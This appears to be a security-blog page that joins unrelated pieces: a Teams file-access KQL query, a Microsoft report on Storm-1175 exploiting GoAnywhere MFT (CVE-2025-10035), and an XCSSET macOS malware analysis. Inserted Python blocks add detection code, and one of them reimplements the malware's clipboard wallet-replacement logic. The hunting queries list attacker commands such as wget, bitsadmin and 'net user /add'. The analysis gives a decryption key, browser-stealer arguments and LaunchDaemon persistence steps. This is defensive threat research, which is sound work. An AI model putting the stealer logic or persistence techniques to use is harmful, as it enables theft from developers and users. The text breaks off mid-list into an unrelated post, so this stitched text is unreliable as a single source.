This query identifies files uploaded to Microsoft Teams chat files and their access history, specifically mentioning operations from SharePoint. It allows tracking of potential file collection activity through Teams-related storage.
OfficeActivity
| where RecordType =~ "SharePointFileOperation"
| where Operation =~ "FileUploaded"
| where UserId != "app@sharepoint"
| where SourceRelativeUrl has "Microsoft Teams Chat Files"
| join kind= leftouter (
OfficeActivity
| where RecordType =~ "SharePointFileOperation"
| where Operation =~ "FileDownloaded" or Operation =~ "FileAccessed"
| where UserId != "app@sharepoint"
| where SourceRelativeUrl has "Microsoft Teams Chat Files"
) on OfficeObjectId
| extend userBag = bag_pack(UserId1, ClientIP1)
| summarize make_set(UserId1, 10000), make_bag(userBag, 10000) by TimeGenerated, UserId, OfficeObjectId, SourceFileName
| extend NumberUsers = array_length(bag_keys(bag_userBag))
| project timestamp=TimeGenerated, UserId, FileLocation=OfficeObjectId, FileName=SourceFileName, AccessedBy=bag_userBag, NumberOfUsersAccessed=NumberUsers
| extend AccountName = tostring(split(UserId, "@")[0]), AccountUPNSuffix = tostring(split(UserId, "@")[1])
| extend Account_0_Name = AccountName
| extend Account_0_UPNSuffix = AccountUPNSuffix
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
On September 18, 2025, Fortra published a security advisory regarding a critical deserialization vulnerability in GoAnywhere MFT’s License Servlet, which is tracked as CVE-2025-10035 and has a CVSS score of 10.0. The vulnerability could allow a threat actor with a validly forged license response signature to deserialize an arbitrary actor-controlled object, possibly leading to command injection and potential remote code execution (RCE). A cybercriminal group tracked by Microsoft Threat Intelligence as Storm-1175, known for deploying Medusa ransomware and exploiting public-facing applications for initial access, was observed exploiting the vulnerability.
Microsoft urges customers to upgrade to the latest version following Fortra’s recommendations. We are publishing this blog post to increase awareness of this threat and to share end-to-end protection coverage details across Microsoft Defender, as well as security posture hardening recommendations for customers.
Vulnerability analysis
The vulnerability, tracked as CVE-2025-10035, is a critical deserialization flaw impacting GoAnywhere MFT’s License Servlet Admin Console versions up to 7.8.3. It enables an attacker to bypass signature verification by crafting a forged license response signature, which then allows the deserialization of arbitrary, attacker-controlled objects.
Successful exploitation could result in command injection and potential RCE on the affected system. Public reports indicate that exploitation does not require authentication if the attacker can craft or intercept valid license responses, making this vulnerability particularly dangerous for internet-exposed instances.
The impact of CVE-2025-10035 is amplified by the fact that, upon successful exploitation, attackers could perform system and user discovery, maintain long-term access, and deploy additional tools for lateral movement and malware. Public advisories recommend immediate patching, reviewing license verification mechanisms, and closely monitoring for suspicious activity in GoAnywhere MFT environments to mitigate risks associated with this vulnerability.
Exploitation activity by Storm-1175
Microsoft Defender researchers identified exploitation activity in multiple organizations aligned to tactics, techniques, and procedures (TTPs) attributed to Storm-1175. Related activity was observed on September 11, 2025.
An analysis of the threat actor’s TTPs reveals a multi-stage attack. For initial access, the threat actor exploited the then-zero-day deserialization vulnerability in GoAnywhere MFT. To maintain persistence, they abused remote monitoring and management (RMM) tools, specifically SimpleHelp and MeshAgent. They dropped the RMM binaries directly under the GoAnywhere MFT process. In addition to these RMM payloads, the creation of .jsp files within the GoAnywhere MFT directories was observed, often at the same time as the dropped RMM tools.
The threat actor then executed user and system discovery commands and deployed tools like netscan for network discovery. Lateral movement was achieved using mstsc.exe, allowing the threat actor to move across systems within the compromised network.
For command and control (C2), the threat actor utilized RMM tools to establish their infrastructure and even set up a Cloudflare tunnel for secure C2 communication. During the exfiltration stage, the deployment and execution of Rclone was observed in at least one victim environment. Ultimately, in one compromised environment, the successful deployment of Medusa ransomware was observed.
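The persistence step just described, RMM binaries and .jsp files written by the GoAnywhere MFT service process, can be expressed as a file-creation check. The Python below is an added example, not Microsoft's or Fortra's code: it applies the same parent-process criteria as the hunting query later on this page (tomcat launched from a \GoAnywhere\ folder, command line ending in //RS//GoAnywhere) to constructed file-creation records shaped loosely like Defender's DeviceFileEvents. The install path C:\Program Files\GoAnywhere, the tomcat9.exe process name, the SimpleHelp.exe and MeshAgent.exe file names, and all sample timestamps are assumptions.

```python
"""Flag persistence artifacts written by the GoAnywhere MFT service process.

Added example (not Microsoft's or Fortra's code). It replays the page's
description of Storm-1175 dropping RMM binaries (SimpleHelp, MeshAgent) and
.jsp files under the GoAnywhere MFT process, over constructed file-creation
records loosely shaped like Defender's DeviceFileEvents. The install path,
the tomcat9.exe process name, the RMM file names and every sample value are
assumptions for the example.
"""
import ntpath
from dataclasses import dataclass

# Assumed on-disk names for the RMM tools named on the page (matched on file stem).
RMM_FILE_STEMS = ("simplehelp", "meshagent")


@dataclass
class FileEvent:
    timestamp: str
    device: str
    file_name: str
    folder_path: str                       # folder the file was written to
    initiating_process_file_name: str
    initiating_process_folder_path: str
    initiating_process_command_line: str


def is_goanywhere_service(ev: FileEvent) -> bool:
    """Parent-process criteria: tomcat started from a GoAnywhere folder
    with the Windows service command line ending in //RS//GoAnywhere."""
    return (
        "\\goanywhere\\" in ev.initiating_process_folder_path.lower()
        and "tomcat" in ev.initiating_process_file_name.lower()
        and ev.initiating_process_command_line.endswith("//RS//GoAnywhere")
    )


def classify_dropped_file(ev: FileEvent):
    """Return a reason if the file is a persistence artifact, otherwise None."""
    stem, ext = ntpath.splitext(ev.file_name.lower())
    if ext == ".jsp" and "\\goanywhere\\" in ev.folder_path.lower():
        return "jsp written into a GoAnywhere directory (possible web shell)"
    if ext == ".exe" and any(rmm in stem for rmm in RMM_FILE_STEMS):
        return "RMM tool dropped by the GoAnywhere service process"
    return None


def find_persistence_artifacts(events):
    """Apply both checks; returns (timestamp, device, full path, reason) tuples."""
    findings = []
    for ev in events:
        if not is_goanywhere_service(ev):
            continue                        # writes by other processes are out of scope here
        reason = classify_dropped_file(ev)
        if reason:
            findings.append((ev.timestamp, ev.device,
                             ntpath.join(ev.folder_path, ev.file_name), reason))
    return findings


# Constructed sample records: two malicious drops, two benign writes.
_GA_BIN = r"C:\Program Files\GoAnywhere\tomcat\bin"
_GA_CMD = r'"C:\Program Files\GoAnywhere\tomcat\bin\tomcat9.exe" //RS//GoAnywhere'
SAMPLE_EVENTS = [
    FileEvent("2025-09-11T03:12:44Z", "mft-01", "SimpleHelp.exe",
              r"C:\Program Files\GoAnywhere\tomcat\temp", "tomcat9.exe", _GA_BIN, _GA_CMD),
    FileEvent("2025-09-11T03:12:51Z", "mft-01", "help.jsp",
              r"C:\Program Files\GoAnywhere\tomcat\webapps\goanywhere", "tomcat9.exe", _GA_BIN, _GA_CMD),
    # Benign: the service writing its own log file.
    FileEvent("2025-09-11T03:13:00Z", "mft-01", "goanywhere.log",
              r"C:\Program Files\GoAnywhere\userdata\logs", "tomcat9.exe", _GA_BIN, _GA_CMD),
    # Benign: an administrator editing a JSP from explorer.exe, not the service.
    FileEvent("2025-09-11T09:00:00Z", "mft-01", "index.jsp",
              r"C:\Program Files\GoAnywhere\tomcat\webapps\goanywhere", "explorer.exe",
              r"C:\Windows", "explorer.exe"),
]

if __name__ == "__main__":
    for finding in find_persistence_artifacts(SAMPLE_EVENTS):
        print(*finding, sep=" | ")
```

The stem list keeps the check narrow on purpose: whether to also alert on every .exe the service writes depends on how often GoAnywhere legitimately writes executables in a given deployment, which only a baseline of that environment can answer.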
Mitigation and protection guidance
Microsoft recommends the following mitigations to reduce the impact of this threat.
Upgrade to the latest version following Fortra’s recommendations. Note that upgrading does not address previous exploitation activity, and review of the impacted system may be required.
Use an enterprise attack surface management product, like Microsoft Defender External Attack Surface Management (Defender EASM), to discover unpatched systems on your perimeter.
Check your perimeter firewall and proxy to ensure servers are restricted from accessing the internet for arbitrary connections, like browsing and downloads. Such restrictions help inhibit malware downloads and command-and-control activity.
Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
Enable investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
Turn on block mode in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
Microsoft Defender customers can turn on attack surface reduction rules to prevent common attack techniques used in ransomware attacks. Attack surface reduction rules are sweeping settings that are effective at stopping entire classes of threats:
Following the release of the vulnerability, the Microsoft Defender Research Team ensured that protections are deployed for customers, from ensuring that Microsoft Defender Vulnerability Management correctly identifies and surfaces all vulnerable devices in impacted customer environments, to building Microsoft Defender for Endpoint detections and alerting along the attack chain.
Microsoft Defender Vulnerability Management customers can search for this vulnerability in the Defender Portal or navigate directly to the CVE page to view a detailed list of the exposed devices within their organization.
Customers of Microsoft Defender Experts for XDR that might have been impacted have also been notified of any post-exploitation activity and recommended actions.
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Tactic: Initial access
Observed activity: Exploitation of GoAnywhere MFT via deserialization in Licensing Service
Microsoft Defender coverage:
Microsoft Defender for Endpoint detects possible exploitation via the following alert:
– Possible exploitation of GoAnywhere MFT vulnerability
Microsoft Defender Experts for XDR can detect possible exploitation via the following alerts:
– Possible exploitation of vulnerability in GoAnywhere Tomcat
– Possible discovery activity following successful Tomcat vulnerability exploitation
Microsoft Defender Vulnerability Management (MDVM) surfaces devices vulnerable to CVE-2025-10035.
Microsoft Defender External Attack Surface Management Attack Surface Insights with the following title can indicate vulnerable devices on your network but is not necessarily indicative of exploitation:
– [Potential] CVE-2025-10035 – GoAnywhere MFT Command Injection via Deserialization in Licensing Service
(Note: An Attack Surface Insight marked as potential indicates a service is running but cannot validate whether that service is running a vulnerable version. Check resources to verify that they are up to date.)

Tactic: Persistence
Observed activity: Dropping and abuse of remote monitoring and management (RMM) tool and suspected web shell deployment; creation of .jsp files within the GoAnywhere MFT directories
Microsoft Defender coverage:
Microsoft Defender for Endpoint detects possible signs of the attacker deploying persistence mechanisms via the following alerts:
– Uncommon remote access software
– Remote access software
– Suspicious file dropped and launched
– Suspicious service launched
– Suspicious account creation
– User account created under suspicious circumstances
– New local admin added using Net commands
– New group added suspiciously
– Suspicious Windows account manipulation
– Ransomware-linked threat actor detected

Tactic: Discovery
Observed activity: User and system discovery commands; deployment of tools such as netscan for network discovery
Microsoft Defender coverage:
Microsoft Defender for Endpoint detects malicious exploration activities via the following alerts:
– Suspicious sequence of exploration activities
– Anomalous account lookups
– Suspicious Windows account manipulation

Tactic: Command and control
Observed activity: Use of RMM tools for establishing C2 infrastructure and setup of Cloudflare tunnel for secure C2 communication
Microsoft Defender coverage:
Microsoft Defender for Endpoint detects C2 activities observed in this campaign via the following alerts:
– Uncommon remote access software
– Remote access software

Tactic: Exfiltration
Observed activity: Rclone deployment and execution
Microsoft Defender coverage:
Microsoft Defender for Endpoint detects exfiltration activities observed in this campaign via the following alert:
– Ransomware-linked threat actor detected

Tactic: Actions on objectives
Observed activity: Deployment of Medusa ransomware
Microsoft Defender coverage:
Microsoft Defender Antivirus detects the ransomware payload used in this attack as the following threat:
– Ransom:Win32/Medusa
Microsoft Defender for Endpoint detects the ransomware payload via the following alert:
– Ransomware-linked threat actor detected
Microsoft Security Copilot
Security Copilot customers can use the standalone experience to create their own prompts or run the following prebuilt promptbooks to automate incident response or investigation tasks related to this threat:
Incident investigation
Microsoft User analysis
Threat actor profile
Threat Intelligence 360 report based on MDTI article
Vulnerability impact assessment
Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.
Threat intelligence reports
Microsoft Defender XDR customers can use the following threat analytics reports in the Defender portal (requires license for at least one Defender XDR product) to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.
Hunting queries
Microsoft Defender XDR
Microsoft Defender XDR customers can run the following queries to find related activity in their networks:
Vulnerable devices
Find devices affected by the CVE-2025-10035 vulnerability.
DeviceTvmSoftwareVulnerabilities
| where CveId in ("CVE-2025-10035")
| summarize by DeviceName, CveId
Possible GoAnywhere MFT exploitation
Look for suspicious PowerShell commands indicative of GoAnywhere MFT exploitation. These commands are also detected with the Defender for Endpoint alert Possible exploitation of GoAnywhere MFT vulnerability.
Look for suspicious cmd.exe commands launched after possible GoAnywhere MFT exploitation. These commands are also detected with the Defender for Endpoint alert Possible exploitation of GoAnywhere MFT vulnerability.
DeviceProcessEvents
| where InitiatingProcessFolderPath contains @"\GoAnywhere\"
| where InitiatingProcessFileName contains "tomcat"
| where InitiatingProcessCommandLine endswith "//RS//GoAnywhere"
| where ProcessCommandLine !contains @"\GIT\"
| where FileName == "cmd.exe"
| where ProcessCommandLine has_any ("powershell.exe", "powershell ", "rundll32.exe", "rundll32 ", "bitsadmin.exe", "bitsadmin ", "wget http", "quser") or ProcessCommandLine has_all ("nltest", "/dclist") or ProcessCommandLine has_all ("nltest", "/domain_trusts") or ProcessCommandLine has_all ("net", "user ", "/add") or ProcessCommandLine has_all ("net", "user ", " /domain") or ProcessCommandLine has_all ("net", " group", "/domain")
Storm-1175 indicators of compromise
The following query identifies known post-compromise tools leveraged in recent GoAnywhere exploitation activity attributed to Storm-1175. Note that the alert Ransomware-linked threat actor detected will detect these hashes.
let fileHashes = dynamic(["4106c35ff46bb6f2f4a42d63a2b8a619f1e1df72414122ddf6fd1b1a644b3220", "c7e2632702d0e22598b90ea226d3cde4830455d9232bd8b33ebcb13827e99bc3", "cd5aa589873d777c6e919c4438afe8bceccad6bbe57739e2ccb70b39aee1e8b3", "5ba7de7d5115789b952d9b1c6cff440c9128f438de933ff9044a68fff8496d19"]);
union
(
DeviceFileEvents
| where SHA256 in (fileHashes)
| project Timestamp, FileHash = SHA256, SourceTable = "DeviceFileEvents"
),
(
DeviceEvents
| where SHA256 in (fileHashes)
| project Timestamp, FileHash = SHA256, SourceTable = "DeviceEvents"
),
(
DeviceImageLoadEvents
| where SHA256 in (fileHashes)
| project Timestamp, FileHash = SHA256, SourceTable = "DeviceImageLoadEvents"
),
(
DeviceProcessEvents
| where SHA256 in (fileHashes)
| project Timestamp, FileHash = SHA256, SourceTable = "DeviceProcessEvents"
)
| order by Timestamp desc
Indicators of compromise
File IoCs (RMM tools in identified Storm-1175 exploitation activity):
Microsoft Threat Intelligence has identified yet another XCSSET variant in the wild that introduces further updates and new modules beyond those detailed in our March 2025 blog post. The XCSSET malware is designed to infect Xcode projects, typically used by software developers, and run while an Xcode project is being built. We assess that this mode of infection and propagation banks on project files being shared among developers building Apple or macOS-related applications.
This new variant of XCSSET brings key changes related to browser targeting, clipboard hijacking, and persistence mechanisms. It employs sophisticated encryption and obfuscation techniques, uses run-only compiled AppleScripts for stealthy execution, and expands its data exfiltration capabilities to include Firefox browser data. It also adds another persistence mechanism through LaunchDaemon entries.
This variant features a submodule designed to monitor the clipboard and references a downloaded configuration file containing address regex patterns associated with various digital wallets. If a pattern match is detected, XCSSET is capable of substituting the clipboard content with its own predefined set of wallet addresses.
In this blog, we will discuss the new modules added to the XCSSET’s inventory and key changes to existing ones. While we’re only seeing this new XCSSET variant in limited attacks as of this writing, we’re publishing our comprehensive analysis to increase awareness of this evolving threat. We shared these findings with Apple and collaborated with GitHub to take down repositories affected by XCSSET. This work reflects our broader commitment to disrupting attacks and dismantling attacker operations. Alongside our findings, we are sharing actionable detections, recommendations, and best practices to help organizations defend against this threat with confidence.
Analysis
The latest XCSSET variant follows a four-stage infection chain. The initial three stages are consistent with those observed in previous variants, as described in our previous blog. This analysis begins with the fourth stage, which includes the boot() function and its associated calls to download and run submodules.
boot() function of the fourth-stage script
The new variant introduces modifications to the boot function. These include additional checks for Firefox browser and modified logic for Telegram existence check. This stage also has multiple new modules that it downloads and executes.
Older variant:
Figure 1. boot() function of the earlier variant
New variant:
Figure 2. boot() function of the latest version
In the following sections, we examine changes to existing submodules as well as additional modules in this variant.
vexyeqj [Older variant: seizecj] (Info-stealer)
In comparison to the previous variant, several commands in this script are commented out. Additionally, it downloads a module called bnk, which is executed using osascript, with the domain supplied as a parameter. It then waits for three seconds and deletes the downloaded file.
Figure 3. Main logic of the Info-stealer submodule
The bnk file is a run-only compiled AppleScript. Direct decompilation of run-only compiled AppleScript is generally considered challenging or not feasible; however, the AppleScript disassembler project on GitHub can be used to disassemble the code for analysis.
The script defines several functions for purposes such as data validation, encryption, decryption, obtaining additional data from command and control (C2), and logging. The script is executed with the domain as its parameter.
Figure 4. Disassembled code of the dec() function
Above is a code snippet of the dec() function, which is used to decrypt the data received from C2 server. Parsing the above leads to the command:
In the referenced code, the encrypted data is stored in the variable in. The first 32 characters of this variable are extracted to serve as the initialization vector (IV). The remaining data is then Base64-decoded and provided to the AES decryption function. In this case, the decryption key is a predefined constant, 27860c1670a8d2f3de7bbc74cd754121, which was established and computed within the main function.
The decoded blob appears to be a configuration file. Presented below is a formatted and redacted sample of the decrypted response obtained from the C2 server:
Figure 5. Configuration data received from the C2 server
The following section examines the core logic of the downloaded bnk payload, explaining how the previous information is interpreted and applied.
Firstly, it calls a defined function to obtain the configuration data from the C2 server; this data is decrypted and stored in a variable. Shell commands are executed to retrieve the SerialNumber and the current user.
The clipboard content is then retrieved (the operation was identified from the AEVT, Apple Event, codes in the disassembly). The process then identifies the frontmost application and checks it against a blocklist defined by the “bad” property in the response from the C2. Processing proceeds only if the current clipboard data differs from both the last clipboard entry and the last replaced clipboard data, the clipboard data is longer than 25 characters, and the oD() function does not return true; oD() returns true when the first four characters are digits. After these checks, the script evaluates a series of further gates and conditions. The first condition checks whether the clipboard length satisfies 50 < len(clipboard) < 300 and whether the clipboard matches the pattern defined in the s record of the response. If it matches, the clipboard data is formatted into a record-type string and exfiltrated to the C2 server; the transmitted data is also AES-encrypted.
In the second condition, the script verifies whether the clipboard length is between 25 and 65, whether it was executed with a single argument, and whether cD(clipboard_data) function returns a value greater than 1, which refers to the count of digits in the data passed in argument. If these conditions are met, the script iterates through the sub collection in the C2 response, which includes individual entries for various wallets. Each sub collection entry contains:
a: Contains a list of addresses from which one is selected; the corresponding clipboard data is subsequently replaced.
t: Refers to the wallet identifier.
r: Specifies the regex pattern used for matching addresses associated with this wallet.
ir (optional): Represents a negative regex pattern; addresses matching this pattern should be excluded.
p: Appears to function as a counter or record index.
For each record, the script tests the clipboard content against the r and ir patterns. If r matches and ir does not, it checks whether the clipboard content is already one of the attacker’s addresses. If it is not, it selects an address from the list and replaces the clipboard content with it. The script then sends information to the C2 server, including the original clipboard data, the replacement data, the wallet name, the frontmost application, and other relevant details. Next, it assigns the clipboard data to the xcP variable, which tracks the most recently replaced clipboard entry. Finally, it updates the xP variable to reflect the current clipboard text, waits for two seconds, and repeats the loop.
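To make the gates above concrete, here is an added Python example (analysis code, not XCSSET's own) that reproduces the described decision logic over a constructed configuration. Nothing in it reads or writes a clipboard or contacts a server; it answers, for a given string, which rule of the config would fire. The config, its regexes and the placeholder addresses are constructed for the example and are not indicators from the campaign; treating a clipboard that already equals an attacker address as a no-op is an assumption, since the page does not say what happens in that case.

```python
"""Evaluate which rule of an XCSSET-style clipboard config would fire for a
given clipboard string.

Added analysis example, not XCSSET's code: it mirrors the gates the page
describes (pre-checks, the 50-300 character "s" match, and the 25-65 character
wallet match with the r/ir patterns) without touching a clipboard. The config
below is constructed; its regexes and addresses are placeholders, not
indicators from the campaign.
"""
import re

# Constructed stand-in for the decrypted config: "bad", "s" and the "sub"
# collection with the a/t/r/ir/p keys described on the page.
SAMPLE_CONFIG = {
    "bad": ["Terminal"],                                  # frontmost-app blocklist
    "s": r"^([a-z]+ ){11,23}[a-z]+$",                     # 12-24 lowercase words
    "sub": [
        {"t": "btc-like", "p": 0,
         "r": r"^1[0-9A-Za-z]{25,33}$",
         "ir": r"^1TEST",                                 # negative pattern: exclude these
         "a": ["1AttackerPlaceholder0000000000001"]},      # placeholder replacement address
        {"t": "eth-like", "p": 1,
         "r": r"^0x[0-9a-fA-F]{40}$",
         "a": ["0x0000000000000000000000000000000000000001"]},
    ],
}


def count_digits(text):
    """The page's cD(): number of digit characters in the string."""
    return sum(ch.isdigit() for ch in text)


def starts_with_four_digits(text):
    """The page's oD(): true when the first four characters are all digits."""
    return len(text) >= 4 and text[:4].isdigit()


def passes_pre_checks(clip, last_clip, last_replaced, frontmost_app, config):
    """Gates evaluated before either condition: app not blocklisted, content new,
    longer than 25 characters and not starting with four digits."""
    return (frontmost_app not in config["bad"]
            and clip != last_clip and clip != last_replaced
            and len(clip) > 25 and not starts_with_four_digits(clip))


def matches_collection_pattern(clip, config):
    """First condition: 50 < len < 300 and the "s" pattern matches
    (the page: the data is then sent to the C2 server)."""
    return 50 < len(clip) < 300 and re.search(config["s"], clip) is not None


def wallet_rule_for(clip, config, argc=1):
    """Second condition: return the "sub" entry that would trigger a replacement,
    or None. Requires 25..65 characters, a single script argument, more than one
    digit, r matching, ir (if present) not matching, and the content not already
    being one of that rule's own addresses (assumed to be a no-op)."""
    if not (25 <= len(clip) <= 65) or argc != 1 or count_digits(clip) <= 1:
        return None
    for entry in config["sub"]:
        if re.search(entry["r"], clip) is None:
            continue
        if entry.get("ir") and re.search(entry["ir"], clip) is not None:
            continue
        if clip in entry["a"]:
            continue          # already an attacker address: assumption, nothing to replace
        return entry
    return None


def triage(clip, config=SAMPLE_CONFIG):
    """Summarise what the described logic would do with one clipboard string."""
    rule = wallet_rule_for(clip, config)
    return {
        "collected": matches_collection_pattern(clip, config),
        "wallet": rule["t"] if rule else None,
        "would_replace": rule is not None,
    }


if __name__ == "__main__":
    for sample in ("1VictimExample" + "0" * 17 + "42",
                   "0xabcdef0123456789abcdef0123456789abcdef01",
                   "abandon ability able about above absent absorb abstract absurd abuse access accident"):
        print(sample[:24], triage(sample))
```

Pointed at a real decrypted config during triage, wallet_rule_for lists the wallet families the sample covers and confirms which of an organisation's own addresses would be matched, which is the question an analyst most often has to answer for this module.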
neq_cdyd_ilvcmwx (File-stealer)
This module retrieves an additional script from the C2 server, which is saved in the /tmp/ directory. The script is subsequently executed with the domain and moduleName provided as parameters. After execution, the downloaded file is deleted. The module operates as a compiled, run-only AppleScript. The script bears similarity to the txzx_vostfdi module, previously identified as a digital wallet data stealer targeting browsers. During analysis, the C2 server did not supply a folder list; however, it is capable of exfiltrating files back to the C2 server.
Figure 6. Additional script being downloaded and executed
xmyyeqjx (LaunchDaemon-based persistence)
This submodule sets up LaunchDaemon persistence for the ~/.root file, which is created in this module. Here’s a summary of the script:
The process begins by creating several paths and a ~/.root file in the user’s HOME directory, which will contain the payload. The payload performs the following actions:
Changes the directory to /Users/Shared
Checks the network connection
Retrieves the local signed-in user
Sleeps for 30 seconds
Executes the ~/.zshrc file in the context of the signed-in user (.zshrc file was appended with malicious payload in previous submodules)
Sleeps for 30 seconds
Modifies two configurations to execute system commands that disable macOS automatic configuration updates and Rapid Security Response mechanisms.
These commands modify macOS Software Update preferences to disable various critical Apple Updates, including Rapid Security Responses (RSR), Security Configuration updates, and others.
It then calls the doMainFunc() function.
Figure 7. Creation of fake application and downloading of additional script from C2 server.
This function first checks whether a LaunchDaemon entry exists whose contents reference the .root file. If none is found, it downloads another script from the C2 server, again a run-only compiled AppleScript. It then creates a fake application named System Settings.app in the /tmp directory, which executes the downloaded AppleScript with two parameters. These parameters appear to be the Label/plist name and the file to be persisted (the ~/.root file). After creating the fake app, it calls another function that waits for the legitimate System Settings application to start and then launches the fake application, so that the activity blends in with the legitimate one.
The downloaded script first obtains the device’s serial number and the current username by executing shell commands. It then forms the path to the LaunchDaemon plist file, constructs its content, and writes that content to the LaunchDaemon file with the echo command; the file name is the one passed as an argument. Below is an example of the created plist file:
Figure 8. Plist content of the created LaunchDaemon entry
It masquerades with the prefix com.google. in the plist name and executes the ~/.root file using bash. The echo command is run using “do shell script … with administrator privileges”, as implied by the badm AEVT code. It then runs the chown command to change the owner to root:wheel and sets 644 permissions on the plist file. Lastly, it runs the launchctl load -w command with sudo to start the daemon.
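As an added defender-side example (not Microsoft's or the malware's code), the following Python audits a LaunchDaemon plist for the shape described above, a vendor-looking com.google. label whose program is a shell interpreter running a dotfile in a user's home, and checks Software Update preferences for the disabled update keys. The plist contents are constructed; the preference keys named are real keys of com.apple.SoftwareUpdate, while treating each of them as expected-true and the com.google. label heuristic are assumptions that a fleet would tune.

```python
"""Audit LaunchDaemon plists and Software Update preferences for the
persistence pattern described above (a vendor-looking label that runs a
hidden file in a user's home via bash, plus disabled Apple update settings).

Added example, not Microsoft's or the malware's code. The plist contents are
constructed stand-ins. The Software Update preference keys named below are
real keys of com.apple.SoftwareUpdate; treating each as "expected true" is an
assumption a fleet may tune.
"""
import glob
import plistlib
import re

# Hidden file directly under a user home, e.g. /Users/alice/.root or ~/.root
HIDDEN_HOME_FILE = re.compile(r"(?:^|\s)(?:/Users/[^/\s]+|~)/\.[^/\s]+")
SHELLS = ("bash", "sh", "zsh")
UPDATE_KEYS_EXPECTED_TRUE = (
    "AutomaticCheckEnabled", "AutomaticDownload", "ConfigDataInstall",
    "CriticalUpdateInstall", "AutomaticallyInstallMacOSUpdates",
)


def audit_launchdaemon(plist_bytes):
    """Return the reasons a LaunchDaemon plist resembles the described persistence."""
    d = plistlib.loads(plist_bytes)
    args = list(d.get("ProgramArguments") or [])
    if d.get("Program"):
        args.insert(0, d["Program"])
    label = str(d.get("Label", ""))
    command = " ".join(args)
    reasons = []
    # A shell interpreter as the program, executing a dotfile in a user home.
    if args and args[0].rsplit("/", 1)[-1] in SHELLS and HIDDEN_HOME_FILE.search(command):
        reasons.append("shell executes a hidden file under a user home")
    # Label claims a vendor that the command line never references (heuristic).
    if label.startswith("com.google.") and "google" not in command.lower():
        reasons.append("com.google. label with no Google binary in the command")
    return reasons


def audit_softwareupdate(plist_bytes):
    """Return update-related keys explicitly set to false."""
    d = plistlib.loads(plist_bytes)
    return [k for k in UPDATE_KEYS_EXPECTED_TRUE if d.get(k) is False]


def audit_launchdaemon_dir(path="/Library/LaunchDaemons"):
    """Run the plist check over a directory (live use on a Mac); not exercised by the samples."""
    results = {}
    for p in glob.glob(f"{path}/*.plist"):
        with open(p, "rb") as fh:
            reasons = audit_launchdaemon(fh.read())
        if reasons:
            results[p] = reasons
    return results


# Constructed samples.
SAMPLE_MALICIOUS_DAEMON = plistlib.dumps({
    "Label": "com.google.placeholder.agent",          # constructed, vendor-looking label
    "ProgramArguments": ["/bin/bash", "/Users/alice/.root"],
    "RunAtLoad": True,
    "KeepAlive": True,
})
SAMPLE_BENIGN_DAEMON = plistlib.dumps({
    "Label": "com.example.backup",
    "ProgramArguments": ["/usr/local/bin/backup", "--nightly"],
    "RunAtLoad": True,
})
SAMPLE_SOFTWAREUPDATE_PREFS = plistlib.dumps({
    "AutomaticCheckEnabled": False,
    "AutomaticDownload": True,
    "ConfigDataInstall": False,
    "CriticalUpdateInstall": False,
})

if __name__ == "__main__":
    print(audit_launchdaemon(SAMPLE_MALICIOUS_DAEMON))
    print(audit_launchdaemon(SAMPLE_BENIGN_DAEMON))
    print(audit_softwareupdate(SAMPLE_SOFTWAREUPDATE_PREFS))
```

On a live system the Software Update preferences can be read from /Library/Preferences/com.apple.SoftwareUpdate.plist and fed to audit_softwareupdate the same way; a key that is absent is reported as neither true nor false, so only explicit disabling is flagged.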
jey [Older Variant: jez] (Git-based persistence)
The command in the older variant executes a direct concatenation of encrypted payload along with the repeated decryption command directly through the shell. In the new variant, the decryption logic is encapsulated within a shell function, which is defined inline and then used to decrypt the encrypted string before passing it to the shell for execution. This change primarily enhances the obfuscation method used by malware.
Old logic:
Figure 9. Payload generation logic in older variant
New logic:
Figure 10. Payload generation logic in the latest variant
iewmilh_cdyd (Info-stealer targeting Firefox)
This new variant has added an info-stealer module to exfiltrate data stored by Firefox. The runMe() function is invoked at first to download a Mach-O FAT binary, which is responsible for all info stealing operations, from the C2 server.
Figure 11. Downloading compiled binary of the HackBrowserData project
This downloaded binary appears to be a modified version of a GitHub project HackBrowserData, which is capable of decrypting and exporting browser data stored by browsers. Passwords, history, credit card information, and cookies are some of the key information it can extract from almost all popular browsers.
Upon downloading, the binary is given executable file permissions, is ad-hoc signed on the victim’s machine, and executed with –b firefox -f json –dir ” & resDir & ” –zip as arguments:
-b: Browser name
-f: format of the output data
–dir: Export directory where the output is stored
–zip: This flag stores the output in compressed ZIP
Once all the data is retrieved, it uploads the compressed ZIP and log file to C2 server with its old method of exfiltrating data in chunks.
Mitigation and protection guidance
Defenders can take the following mitigation steps to defend against this threat:
Run the latest version of your operating systems and applications. Deploy the latest security updates as soon as they become available.
Always inspect and verify Xcode projects downloaded or cloned from repositories, as the malware usually spreads through infected projects.
Exercise caution when copying and pasting sensitive data from the clipboard. Always verify that the pasted content matches the intended source to avoid falling victim to clipboard hijacking or data tampering attacks.
Encourage users to use web browsers that support Microsoft Defender SmartScreen like Microsoft Edge—available on macOS and various platforms—which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware.
Microsoft Defender for Endpoint customers can also apply the following mitigations to reduce the environmental attack surface and mitigate the impact of this threat and its payloads:
Turn on cloud-delivered protection and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.
